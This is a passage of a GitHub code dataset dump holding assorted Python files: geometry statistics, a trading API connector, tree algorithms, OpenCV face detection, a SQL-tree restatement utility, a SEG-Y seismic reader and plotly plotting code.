a string\ndef recursive_base_2(num):\n # Binary number of 0 and 1 is itself\n if num < 2 :\n binary = num\n else: \n binary = str(recursive_base_2(num//2)) + str(num%2) #call function recursively with integer division\n return binary\n\n\ndef main():\n print(\"\"\"May Trinh\nCMPS 4143 - Contemporary Programming Language\nThis program will open a file with decimal number, -1 is the sentinel value that will end the program\nIt will call a recursive function to convert the decimal number to binary number.\"\"\")\n \n fileName = input(\"Enter a file name: \")\n with open(fileName) as file: #with open does not require .close(). It will close automatically\n data = file.read()\n nums = list(map(int,(data.split()))) # read numbers in as a list\n\n item = 0\n x = nums[item]\n\n #read number from the file until -1 is found\n while x is not -1:\n binary = recursive_base_2(x)\n print(\"{0} = {1}\".format(x,binary))\n item += 1\n x = nums[item]\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n","repo_name":"maysie0110/CMPS-4143-Contemporary-Programming-Language","sub_path":"Assignments/program2.py","file_name":"program2.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23885882296","text":"\"\"\"Statistical Manifold of categorical distributions with the Fisher metric.\n\nLead author: Alice Le Brigant.\n\"\"\"\nfrom scipy.stats import multinomial\n\nimport geomstats.backend as gs\nfrom geomstats.information_geometry.multinomial import (\n MultinomialDistributions,\n MultinomialMetric,\n)\n\n\nclass CategoricalDistributions(MultinomialDistributions):\n r\"\"\"Class for the manifold of categorical distributions.\n\n This is the set of `n+1`-tuples of positive reals that sum up to one,\n i.e. the `n`-simplex. Each point is the parameter of a categorical\n distribution, i.e. gives the probabilities of $n$ different outcomes\n in a single experiment.\n\n Attributes\n ----------\n dim : int\n Dimension of the manifold of categorical distributions. The\n number of outcomes is dim + 1.\n embedding_manifold : Manifold\n Embedding manifold.\n \"\"\"\n\n def __init__(self, dim, **kwargs):\n kwargs.setdefault(\"metric\", CategoricalMetric(dim=dim))\n super().__init__(dim=dim, n_draws=1, **kwargs)\n\n def sample(self, point, n_samples=1):\n \"\"\"Sample from the categorical distribution.\n\n Sample from the multinomial distribution with parameters provided by\n point. This gives samples in the simplex.\n Then take the argmax to get the category associated to the sample drawn.\n\n Parameters\n ----------\n point : array-like, shape=[..., dim + 1]\n Parameters of a categorical distribution, i.e. probabilities\n associated to dim + 1 outcomes.\n n_samples : int\n Number of points to sample with each set of parameters in point.\n Optional, default: 1.\n\n Returns\n -------\n samples : array-like, shape=[..., n_samples]\n Samples from categorical distributions.\n \"\"\"\n point = gs.to_ndarray(point, to_ndim=2)\n samples = []\n for param in point:\n counts = multinomial.rvs(self.n_draws, param, size=n_samples)\n samples.append(gs.argmax(counts, axis=-1))\n return samples[0] if len(point) == 1 else gs.stack(samples)\n\n\nclass CategoricalMetric(MultinomialMetric):\n \"\"\"Class for the Fisher information metric on categorical distributions.\n\n The Fisher information metric on the $n$-simplex of categorical\n distributions parameters can be obtained as the pullback metric of the\n $n$-sphere using the componentwise square root.\n\n References\n ----------\n .. [K2003] R. E. Kass. The Geometry of Asymptotic Inference. Statistical\n Science, 4(3): 188 - 234, 1989.\n \"\"\"\n\n def __init__(self, dim):\n super().__init__(dim=dim, n_draws=1)\n","repo_name":"CharlesKulick/geomstats","sub_path":"geomstats/information_geometry/categorical.py","file_name":"categorical.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72534599734","text":"from conf import ANGEL_TOTP, ANGEL_API_KEY, ANGLE_CLIENT_ID, ANGEL_PIN\nfrom SmartApi import SmartConnect\nimport pyotp\n\nclass AnagelOneConnector:\n def __init__(self):\n self.totp = ANGEL_TOTP\n self.apiKey = ANGEL_API_KEY\n self.clientId = ANGLE_CLIENT_ID\n self.pwd = ANGEL_PIN\n self.authToken = None\n self.refreshToken = None\n \n\n def connect(self):\n smartApi = SmartConnect(self.apiKey)\n totp = pyotp.TOTP(self.totp).now()\n data = smartApi.generateSession(self.clientId, self.pwd, totp)\n # self.authToken = data['data']['jwtToken']\n # self.refreshToken = data['data']['refreshToken']\n # print(self.authToken)\n # feedToken = smartApi.getfeedToken()\n # smartApi.ltpData()\n exchange = 'NFO' \n tradingsymbol = 'BANKNIFTY31AUG2345000PE'\n symboltoken = '60496'\n data = smartApi.ltpData(exchange, tradingsymbol, symboltoken)\n print(data)\n\n\n\n\n\n\n","repo_name":"uvaiskh/AlgoTrade","sub_path":"common/commonFunctions.py","file_name":"commonFunctions.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22328326656","text":"#https://practice.geeksforgeeks.org/problems/top-view-of-binary-tree/1\n\n#Combines Level Order Traversal + Vertical Order Traversal \n\ndef verticalOrder(root):\n queue=[root]\n hd_given_ele={root.data:0} #horizontal distance\n while queue:\n ele=queue.pop(0)\n if(ele.left):\n l=ele.left.data\n queue.append(ele.left)\n hd_given_ele[l]=hd_given_ele[ele.data]-1\n if(ele.right):\n r=ele.right.data\n queue.append(ele.right)\n hd_given_ele[r]=hd_given_ele[ele.data]+1\n \n return hd_given_ele\n \ndef printTopView(root):\n hd_ge=verticalOrder(root)\n queue=[root]\n added=set()\n while queue:\n ele=queue.pop(0)\n h=hd_ge[ele.data]\n if(h not in added):\n added.add(h)\n print(ele.data,end=\" \")\n if(ele.left):\n queue.append(ele.left)\n if(ele.right):\n queue.append(ele.right)","repo_name":"thecodearrow/Algorithms","sub_path":"Data Stuctures/Trees/TopView.py","file_name":"TopView.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"7509646413","text":"import cv2\n\n#load cascade\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalcatface.xml')\n\n#capture video from webcam \ncap = cv2.VideoCapture(0)\n\nwhile True:\n #read frame\n ret, frame = cap.read()\n #convert to gray\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #detect faces\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n #draw rectangle around faces\n for (x,y,w,h) in faces:\n cv2.rectangle(frame, (x,y), (x+w, y+h), (255,0,0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = frame[y:y+h, x:x+w]\n #display frame\n cv2.imshow('frame', frame)\n #wait for key press\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\n","repo_name":"brettsullivan98/face_recognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20709858385","text":"import pytest\nfrom selenium.webdriver.support import expected_conditions\nimport selenium\n\n\n@pytest.fixture(scope='module')\ndef start():\n start = selenium.webdriver.Chrome(executable_path='D:\\\\learn\\\\projects\\\\test_selenium\\\\chromedriver.exe')\n start.fullscreen_window()\n start.get('https://market.yandex.ru/')\n start.implicitly_wait(20)\n return start\n","repo_name":"Alex-testing/test_selenium","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19761493509","text":"# https://leetcode.com/problems/binary-tree-right-side-view/\n# 199. Binary Tree Right Side View\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def rightSideView(self, root: Optional[TreeNode]) -> List[int]:\n if not root:\n return []\n \n queue = [root]\n out = []\n while queue:\n out.append(queue[-1].val)\n new_queue = []\n for node in queue:\n if node.left:\n new_queue.append(node.left)\n if node.right:\n new_queue.append(node.right)\n \n queue = new_queue\n \n return out\n ","repo_name":"Priyansh121096/leetcode","sub_path":"199.py","file_name":"199.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8179601673","text":"# coding: utf-8\n\nimport random\nimport copy\nfrom typing import List\n\n\nclass Node:\n STATEMENT_TYPE = 0\n ROOT_TYPE = 1\n SELECT_TYPE = 2\n FILTER_TYPE = 3\n ORDER_TYPE = 4\n A_TYPE = 5\n\n COLUMN_TYPE = 11\n TABLE_TYPE = 12\n KEYWORD_TYPE = 13\n\n VALUE_TYPE = '3'\n\n TYPE_DICT = {'SQL': None, 'Statement': STATEMENT_TYPE, 'Root': ROOT_TYPE, 'Select': SELECT_TYPE, 'Filter': FILTER_TYPE,\n 'Order': ORDER_TYPE, 'A': A_TYPE, 'C': COLUMN_TYPE, 'T': TABLE_TYPE, 'Value': VALUE_TYPE}\n KEYWORD_LIST = [\n 'intersect', 'union', 'except', # Statement\n 'asc', 'des', 'limit', # Order\n 'and', 'or', '>', '<', '>=', '<=', '=', '!=', 'between', 'like', 'not_like', 'in', 'not_in', # Filter\n 'max', 'min', 'count', 'sum', 'avg', 'none' # A\n ]\n RULE_TEMPLATES = {\n # SQL\n 'Statement': 'Find out {0}',\n # Statement\n 'intersect Root Root': 'the common part of the set of {0} and the set of {1}',\n 'union Root Root': 'everyone in the set of {0} and the set of {1}',\n 'except Root Root': 'everyone in the set of {0} but not in the set of {1}',\n 'Root': '{0}',\n # Root\n 'Select Filter Order': '{0}, {1}, {2}',\n 'Select Filter': '{0}, {1}',\n 'Select Order': '{0}, {1}',\n 'Select': '{0}',\n # Select\n 'A': '{0}',\n 'A A': '{0} and {1}',\n 'A A A': '{0} , {1} and {2}',\n 'A A A A': '{0} , {1} , {2} and {3}',\n 'A A A A A': '{0} , {1} , {2} , {3} and {4}',\n 'A A A A A A': '{0} , {1} , {2} , {3} , {4} and {5}',\n # A\n 'none C T': 'the {0} of {1}',\n 'max C T': 'the maximum {0} of {1}',\n 'min C T': 'the minimum {0} of {1}',\n 'count C T': 'the number of {0} of {1}',\n 'sum C T': 'the sum of {0} of {1}',\n 'avg C T': 'the average {0} of {1}',\n # Filter\n 'Filter and Filter': '{0} and {1}',\n 'Filter or Filter': '{0} or {1}',\n '= A': 'where {0} is {1}'.format('{0}', VALUE_TYPE),#['where {0} equals to {1}'.format('{0}', VALUE_TYPE), 'where {0} is {1}'.format('{0}', VALUE_TYPE)],\n '> A': 'where {0} greater than {1}'.format('{0}', VALUE_TYPE),\n '< A': 'where {0} less than {1}'.format('{0}', VALUE_TYPE),\n '>= A': 'where {0} greater than or equals to {1}'.format('{0}', VALUE_TYPE),\n '<= A': 'where {0} less than or equals to {1}'.format('{0}', VALUE_TYPE),\n '!= A': 'where {0} not equals to {1}'.format('{0}', VALUE_TYPE),\n 'between A': 'where {0} between {1} and {2}'.format('{0}', VALUE_TYPE, VALUE_TYPE),\n 'like A': 'where {0} like {1}'.format('{0}', VALUE_TYPE),\n 'not_like A': 'where {0} not like {1}'.format('{0}', VALUE_TYPE),\n '= A Root': ['where {0} equals to {1}', 'where {0} is {1}'],\n '> A Root': 'where {0} greater than {1}',\n '< A Root': 'where {0} less than {1}',\n '>= A Root': 'where {0} greater than or equals to {1}',\n '<= A Root': 'where {0} less than or equals to {1}',\n '!= A Root': 'where {0} not equals to {1}',\n 'between A Root': 'where {0} is between {1}', # todo: useless\n 'in A Root': 'where {0} is in the set of {1}',\n 'not_in A Root': 'where {0} is not in the set of {1}',\n # Order\n 'asc A': 'in ascending order of {0}',\n 'des A': 'in descending order of {0}',\n 'asc A limit': 'in ascending order of {0}' + 'with maximum {0} item(s)'.format(VALUE_TYPE),\n 'des A limit': 'in descending order of {0}' + 'with maximum {0} item(s)'.format(VALUE_TYPE),\n }\n RULE_TEMPLATES_WITHOUT_TABLE = copy.copy(RULE_TEMPLATES)\n RULE_TEMPLATES_WITHOUT_TABLE.update({\n 'none C T': 'the {0}',\n 'max C T': 'the maximum {0}',\n 'min C T': 'the minimum {0}',\n 'count C T': 'the number of {0}',\n 'sum C T': 'the sum of {0}',\n 'avg C T': 'the average {0}',\n })\n\n def __init__(self, node_id: int,\n text: str,\n statement: str,\n children_tokens: List[str],\n father=None,\n depth=0):\n self.node_id = node_id\n self.text = text\n self.statement = statement.split(' -> ')[1].strip() # align with irnet.context.grammar\n if text in Node.TYPE_DICT:\n self.type = Node.TYPE_DICT.get(text)\n elif text in Node.KEYWORD_LIST:\n self.type = Node.KEYWORD_TYPE\n else:\n raise Exception('Node type error')\n self._children_tokens = children_tokens\n self.children = []\n self.father = father\n self.depth = depth\n # father_text = 'None' if father is None else father.text\n # print(f'Created node: text={text}, children_tokens={children_tokens}, father={father_text}')\n self.checked: bool = True\n self.more_info = {} # data container for outside operations\n\n def bfs(self, process_f=lambda x: x, node_only=True):\n ret_list = []\n queue = [self]\n while queue:\n node = queue[0]\n del queue[0]\n if isinstance(node, Node):\n ret_list.append(process_f(node))\n elif isinstance(node, str) and not node_only:\n ret_list.append(process_f(node))\n if isinstance(node, Node) and node.children:\n queue += node.children\n return ret_list\n\n def restatement(self, with_table=True):\n # 1. Find if Root node exists in subtree, if unchecked leaved, raise error # todo: may be eliminated\n subtree_nodes = self.bfs()\n if False in [node.checked for node in subtree_nodes if not isinstance(node, str) and node.type == Node.ROOT_TYPE]:\n raise Exception('Unchecked Root node exists, check it first')\n\n # 2. Restate each child\n return self._restate_node(self, with_table=with_table)\n\n def restatement_with_tag(self):\n # 1. Find if Root node exists in subtree, if unchecked leaved, raise error # todo: may be eliminated\n subtree_nodes = self.bfs()\n if False in [node.checked for node in subtree_nodes if\n not isinstance(node, str) and node.type == Node.ROOT_TYPE]:\n raise Exception('Unchecked Root node exists, check it first')\n\n # 2. Restate each child\n return self._restate_node_with_tag(self)\n\n @staticmethod\n def _restate_node(node, with_table=True):\n if isinstance(node, str) and node not in Node.KEYWORD_LIST:\n raise Exception('WA!!!')\n node_statement = node.statement\n templates = Node.RULE_TEMPLATES if with_table else Node.RULE_TEMPLATES_WITHOUT_TABLE\n if node_statement in templates:\n rule_template = templates.get(node_statement)\n if isinstance(rule_template, List):\n rule_template = random.sample(rule_template, 1)[0]\n format_strings = []\n for child in node.children:\n if isinstance(child, str) and child in Node.KEYWORD_LIST:\n continue\n format_strings.append(Node._restate_node(child, with_table=with_table))\n return rule_template.format(*format_strings)\n else:\n return ' '.join(node_statement.split('_')) if node_statement is not '*' else 'items' # select *\n\n @staticmethod\n def _restate_node_with_tag(node, with_table=True):\n if isinstance(node, str) and node not in Node.KEYWORD_LIST:\n raise Exception('WA!!!')\n node_statement = node.statement\n templates = Node.RULE_TEMPLATES if with_table else Node.RULE_TEMPLATES_WITHOUT_TABLE\n if node_statement in templates:\n rule_template = templates.get(node_statement)\n if isinstance(rule_template, List):\n rule_template = random.sample(rule_template, 1)[0]\n sub_strings = []\n sub_string_tags = []\n for child in node.children:\n if isinstance(child, str) and child in Node.KEYWORD_LIST:\n continue\n node_restatement_string, node_restatement_tag = Node._restate_node_with_tag(child)\n sub_strings.append(node_restatement_string)\n sub_string_tags.append(node_restatement_tag)\n restatement_string = rule_template.format(*sub_strings)\n restatement_tag = []\n nonterminal_children = [_ for _ in node.children if isinstance(_, Node)]\n for word in rule_template.split():\n if word.startswith('{') and word.endswith('}'):\n placeholder_idx = int(word[1:-1])\n if sub_string_tags[placeholder_idx] is not None:\n restatement_tag += sub_string_tags[placeholder_idx]\n else:\n restatement_tag += nonterminal_children[placeholder_idx].text * len(sub_strings[placeholder_idx].split())\n else:\n restatement_tag.append(node.text)\n return restatement_string, restatement_tag\n else:\n return ' '.join(node_statement.split('_')) if node_statement is not '*' else 'items', None\n # todo: tag of table and column with split char\n\n @staticmethod\n def print_subtree(node):\n def _print_subtree(node):\n print(' ' * node.depth + node.text)\n for child in node.children:\n if isinstance(child, Node):\n _print_subtree(child)\n else:\n print(' ' * (node.depth + 1) + child)\n\n _print_subtree(node)\n\n def clear_more_info_recursively(self, keys=None):\n if keys is None:\n def clear_more_info(node):\n node.more_info.clear()\n else:\n def clear_more_info(node):\n for key in keys:\n if key in node.more_info:\n del node.more_info[key]\n\n self.bfs(process_f=clear_more_info)\n\n def compare_node(self, node) -> bool:\n if self.type == node.type and self.children == node.children:\n return True\n else:\n return False\n\n def compare_tree(self, node) -> bool:\n if self.type != node.type or self.statement != node.statement:\n self.more_info['subtree_equal'] = node.more_info['subtree_equal'] = False\n self.bfs(lambda x: x.more_info.update({'subtree_equal': False}))\n node.bfs(lambda x: x.more_info.update({'subtree_equal': False}))\n return False\n else:\n assert len(self.children) == len(node.children)\n status = True\n for child1, child2 in zip(self.children, node.children):\n if isinstance(child1, str) or isinstance(child2, str):\n if child1 != child2:\n status = False\n elif child1.compare_tree(child2) is False:\n status = False\n self.more_info['subtree_equal'] = node.more_info['subtree_equal'] = status\n self.bfs(lambda x: x.more_info.update({'subtree_equal': status}))\n node.bfs(lambda x: x.more_info.update({'subtree_equal': status}))\n return status\n\n @staticmethod\n def from_statements(statements):\n root, _ = parse_sql_tree(statements)\n return root\n\n\ndef is_nonterminal(token):\n letter = token[0]\n if ord('A') <= ord(letter) <= ord('Z'):\n return True\n else:\n return False\n\n\ndef parse_sql_tree(tree_statements):\n # print(tree_statements)\n max_depth = -1\n depth = 0\n stack = []\n root = Node(0, 'SQL', 'SQL -> Statement', ['Statement'], depth=0)\n stack.append(root)\n for state_id, statement in enumerate(tree_statements):\n assert statement.split(' -> ')[0] == stack[-1]._children_tokens[0] # non-terminal match\n # print(f'statement = {statement}')\n nonterminal, children = statement.split('->')\n nonterminal = nonterminal.strip()\n children = [child.strip() for child in children.strip().split(' ')]\n node = Node(state_id, nonterminal, statement, children, father=stack[-1], depth=depth)\n stack[-1].children.append(node)\n del stack[-1]._children_tokens[0]\n stack.append(node)\n depth += 1\n max_depth = max(max_depth, depth)\n while stack:\n # move terminal tokens from children_tokens into children\n while stack[-1]._children_tokens and not is_nonterminal(stack[-1]._children_tokens[0]):\n stack[-1].children.append(stack[-1]._children_tokens[0])\n del stack[-1]._children_tokens[0]\n # layer up if no child waiting for process\n if len(stack[-1]._children_tokens) == 0:\n stack.pop()\n depth -= 1\n if len(stack) == 0:\n return root, max_depth\n else:\n break\n return root, max_depth\n\n\nif __name__ == '__main__':\n # sql_tree = ['Statement -> Root', 'Root -> Select Filter',\n # 'Select -> A', 'A -> count C T', 'C -> budget_in_billions', 'T -> department',\n # 'Filter -> > A', 'A -> none C T', 'C -> age', 'T -> head']\n sql_tree = ['Statement -> Root', 'Root -> Select Filter',\n 'Select -> A', 'A -> sum C T', 'C -> enr', 'T -> college',\n 'Filter -> not_in A Root', 'A -> none C T', 'C -> cname', 'T -> college',\n 'Root -> Select Filter',\n 'Select -> A', 'A -> none C T', 'C -> cname', 'T -> tryout',\n 'Filter -> = A', 'A -> none C T', 'C -> ppos', 'T -> tryout']\n root, max_depth = parse_sql_tree(sql_tree)\n Node.print_subtree(root)\n restatement = root.restatement_with_tag()\n print(restatement)\n","repo_name":"microsoft/ContextualSP","sub_path":"interactive_text_to_sql/src/utils/semql_tree_util.py","file_name":"semql_tree_util.py","file_ext":"py","file_size_in_byte":13838,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"21"} +{"seq_id":"75054635893","text":"m = int(input())\n\nfor j in range(m):\n\tn = int(input())\n\tmaxLen = 0\n\tstartIndex = 0\n\ts = {}\n\n\tfor i in range(n):\n\t\tnewNum = int(input())\n\t\tlastIndex = s.get(newNum)\n\t\ts[newNum] = i\n\t\tif lastIndex is not None and (lastIndex >= startIndex):\n\t\t\t#print(f\"Duplicate of {newNum} found\")\n\t\t\tstartIndex = lastIndex+1\n\t\tmaxLen = max(maxLen,i-startIndex+1)\n\t\t#print(f\"last occ was {lastIndex}, current max is {maxLen}\")\n\tprint(maxLen)\n","repo_name":"jolitti/codingdei","sub_path":"old/snowflakes.py","file_name":"snowflakes.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21511876594","text":"\ncluster_cache_dir = \"/mnt/ds3lab-scratch/dslab2019/shghosh/preprocessed\" #Cache dir on cluster\nlocal_cache_dir = \"./preprocessed\" #Cache dir -- local\n\ncluster_base_dir = \"/mnt/ds3lab-scratch/bhendj/data\"\nlocal_base_dir = \".\"\n\noriginal_obs_x_highres = 253\noriginal_obs_y_highres = 375\n\nappended_obs_x_highres = 256\nappended_obs_y_highres = 384\n\noriginal_obs_x_lowres = 127\noriginal_obs_y_lowres = 188\n\nappended_obs_x_lowres = 128\nappended_obs_y_lowres = 192\n\noriginal_pred_x = 127\noriginal_pred_y = 188\n\nappended_pred_x = 128\nappended_pred_y = 192\n","repo_name":"butoialexandra/Realistic-looking-rainfall-forecasts","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"13705563845","text":"# -*- coding: utf-8 -*-\nimport segyio\nimport math\nimport numpy as np \n#read information of seismic data\n###############################################################################\n\ndef getSEGYInformation(filename):\n print(\"### Get Datafile Informaton:\")\n print(\" Data file --> [%s]\"%(filename))\n \n mTrace = 0\n nTrace = 0\n nSample = 0\n startT = 0\n deltaT = 0\n sortCode = 0\n formatFlag = 0\n \n with segyio.open(filename,\"r\",ignore_geometry = True) as f:\n f.mmap()\n mTrace = f.tracecount\n nTrace = f.bin[segyio.BinField.Traces]\n nSample = f.bin[segyio.BinField.Samples]\n deltaT = f.bin[segyio.BinField.Interval]\n sortCode = f.bin[segyio.BinField.SortingCode]\n formatFlag = f.bin[segyio.BinField.Format]\n f.close()\n \n return (mTrace,nTrace,nSample,startT,deltaT,sortCode,formatFlag)\n#End of getSEGYInformation\n\n#read Seismic Data\n###############################################################################\ndef readSEGYData(filename):\n print(\"### Reading SEGY-formatted Seismic Data:\")\n print(\" Data file --> [%s]\" % (filename))\n \n nTrace = 0\n nSample = 0\n startT = 0\n deltaT = 0\n \n with segyio.open(filename,\"r\",ignore_geometry = True) as f:\n f.mmap()\n nTrace = f.tracecount\n nSample = f.bin[segyio.BinField.Samples]\n deltaT = f.bin[segyio.BinField.Interval]\n \n print(\"### Number of Trace = %d\" %(nTrace))\n print(\"### Number of Samples = %d\" %(nSample))\n print(\"### Start Sample = %d\" %(startT))\n print(\"### Sampling Rate = %d\" %(deltaT))\n \n print(\"====================================\")\n print(\" Trace X-coord Y-coord\")\n print(\"====================================\")\n for i in range(0,nTrace,math.floor(nTrace/10)):\n id = f.header[i][segyio.TraceField.TRACE_SEQUENCE_LINE]\n x = f.header[i][segyio.TraceField.GroupX]\n y = f.header[i][segyio.TraceField.GroupY]\n print(\" %8d%12.2f%12.2f\"%(id,x,y))\n print(\"====================================\")\n \n mySeis = np.zeros((nTrace,nSample),dtype = np.float32)\n for i in range(nTrace):\n for j in range(nSample):\n mySeis[i][j] = f.trace[i][j]\n f.close()\n \n return (mySeis)\n#End of readSEGYData","repo_name":"cicyby/SEGY_Reader","sub_path":"kernel/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33601199274","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt5.QtWidgets import QWidget, QHBoxLayout, QSplitter\n\nfrom componment.left_frame import LeftFrame\nfrom componment.middle_frame import MiddleFrame\nfrom componment.right_frame import RightFrame\nfrom tools.config import GlobalContext, Const\n\n\nclass LmrManager(QWidget):\n\n def __init__(self):\n super(LmrManager, self).__init__()\n\n self.h_layout = QHBoxLayout()\n\n self.left_frame = LeftFrame()\n\n self.middle_frame = MiddleFrame()\n self.right_frame = RightFrame()\n\n self.mr_splitter = QSplitter()\n\n # 缩小三个框直接的缝隙\n self.mr_splitter.setHandleWidth(1)\n\n self.mr_splitter.insertWidget(0, self.middle_frame)\n self.mr_splitter.insertWidget(1, self.right_frame)\n\n self.mr_splitter.setStretchFactor(0, 1) # 全屏后保持1:4的比例,但是之前设置的最小宽度此时可能就比较小了\n self.mr_splitter.setStretchFactor(1, 4)\n\n # 设置为不可拖动至隐藏\n self.mr_splitter.setCollapsible(0, False)\n self.mr_splitter.setCollapsible(1, False)\n\n self.h_layout.addWidget(self.left_frame)\n self.h_layout.addWidget(self.mr_splitter)\n\n self.setLayout(self.h_layout)\n\n","repo_name":"pleuvoir/like-me-learn","sub_path":"componment/lmr_mgr.py","file_name":"lmr_mgr.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41413790576","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 1 17:03:23 2019\n\n@author: instalador\n\"\"\"\nimport numpy as np\nimport plotly.graph_objects as go\n\nfrom plotly.subplots import make_subplots\n\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\nfrom matplotlib import cm\nfrom collections import OrderedDict\n\n\ndef Reverse_ColorBar(Bar_input):\n Bar_output = np.zeros(Bar_input.shape)\n for k in range(Bar_input.shape[0]):\n Bar_output[k,:] = Bar_input[Bar_input.shape[0]-1-k,:] \n return Bar_output\n\n\n#------------------------------------------------------------------------------\ndef ColorMap():\n cmp_list = [ 'viridis','Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds',\n 'YlOrBr' , 'YlOrRd', 'OrRd', 'PuRd', 'RdPu', 'BuPu',\n 'GnBu', 'PuBu', 'YlGnBu', 'PuBuGn', 'BuGn', 'YlGn']\n c_map = cm.get_cmap(cmp_list[0]+'', 256) # ''= normal, '_r' = reversed\n color_BAR = c_map(np.linspace(0, 1, 64))\n \n matlab = 'inicial' #-----------el de Matlab---------------\n matlab = 'new'\n if matlab == 'inicial': \n color_BAR_r = Reverse_ColorBar(color_BAR)\n c_map = ListedColormap(color_BAR_r) \n return c_map,color_BAR,\n#------------------------------------------------------------------------------\ndef barra_RGB(color_BAR):\n# 'rgb(0.9553 , 0.901065, 0.118128)'\n color_BAR_RGB = []\n for color in color_BAR:\n color_RGB = 'rgb('+str(color[0])+','+str(color[1])+','+str(color[2])+')'\n color_BAR_RGB.append(color_RGB)\n \n return color_BAR_RGB\n \n#------------------------------------------------------------------------------\ndef plot_ColorBar(dib,RGB_bar,Vref):\n D = Vref/64\n d = D/2\n \n for k in range(64):\n p_x = 1\n p_y = k*D+d\n dib.add_shape(go.layout.Shape(type=\"rect\",x0=p_x-d,y0=p_y-d,x1=p_x+d,y1=p_y+d,\n line=dict(color=RGB_bar[k]),\n fillcolor=RGB_bar[k]),secondary_y=True,row=1, col=2)\n dib.update_xaxes(range=[0.5, 1], showgrid=False,title_text=\"\",showticklabels=False, row=1, col=2)\n# dib.update_yaxes(range=[0, Vref], showgrid=False ,title_text=\"yaxis izda2 title\" ,secondary_y=False, row=1, col=2)\n dib.update_yaxes(range=[0, Vref], showgrid=False ,title_text=\"yaxis dcha2 title\" ,secondary_y=True, row=1, col=2)\n \n return\n#------------------------------------------------------------------------------\ndef add_text(dib,texto,x0,y0,color):\n dib.add_trace(go.Scatter(x=x0,y=y0,text=texto, mode=\"text\",orientation ='v',textposition=\"bottom center\",\n# textfont=dict(family=\"sans serif\", size=18, color=color )\n ), row=1, col=1)\n return\n#------------------------------------------------------------------------------\ndef add_patch(dib,p_x,p_y, color):\n dib.add_shape(go.layout.Shape(type=\"rect\",x0=p_x-0.25,y0=p_y-0.25,x1=p_x+0.25,y1=p_y+0.25,\n line=dict(color=color), fillcolor=color), row=1, col=1 )\n return\n#------------------------------------------------------------------------------\ndef add_polygon(dib,x_points,y_points,color):\n camino = 'M' \n for index,k in enumerate(x_points):\n camino = camino + ' '+ str(x_points[index]) +','+str(y_points[index])\n if index < np.size(x_points)-1:\n camino = camino + ' L'\n camino = camino + ' Z'\n print(camino)\n \n dib.add_shape(go.layout.Shape(type=\"path\",path=camino,fillcolor=color),line_color=color, row=1, col=1)\n \n \n return\n#------------------------------------------------------------------------------\n \nc_mapa,color_barra = ColorMap()\nRGB_bar = barra_RGB(color_barra) # to generate in rgb(0.267004,0.004874,0.329415)\n\n\n\n\nfig = make_subplots(rows=1, cols=2, column_widths=[10, 0.5], subplot_titles=(\"Plot 1\", \"\"),specs=[[{\"secondary_y\": False}, {\"secondary_y\": True}]] )\n\n\n\n\n\n#fig.add_shape(go.layout.Shape(type=\"path\",path=\" M 4,4 L 1,8 L 3,9 L3,8 L4,6 L4,5 Z\",fillcolor=RGB_bar[0]),line_color=RGB_bar[0], row=1, col=1)\n#fig.update_layout(shapes=[go.layout.Shape (type=\"path\",path=\" M 4,4 L 1,8 L 3,9 L3,8 L4,6 L4,5 Z\",fillcolor=RGB_bar[0],line_color=RGB_bar[0], row=1, col=1) ])\n\n\n\nVref = 155\nplot_ColorBar(fig,RGB_bar,Vref)\n#------------------Crear el colorbar-------------------------------------\n#D = Vref/64\n#d = D/2\n#\n##fig.add_trace(\n## go.Scatter(x=[2, 3, 4], y=[4, 5, 6], name=\"yaxis2 data\"),\n## secondary_y=True,)\n#\n#for k in range(64):\n# p_x = 1\n# p_y = k*D+d\n# fig.add_shape(go.layout.Shape(type=\"rect\",x0=p_x-d,y0=p_y-d,x1=p_x+d,y1=p_y+d,\n# line=dict(color=RGB_bar[k]),\n# fillcolor=RGB_bar[k]),row=1, col=2)\n#fig.update_xaxes(range=[0.5, 1], showgrid=False,title_text=\"xaxis 2 title\",showticklabels=False, row=1, col=2)\n#fig.update_yaxes(range=[0, Vref], showgrid=False ,title_text=\"yaxis 2 title\" , row=1, 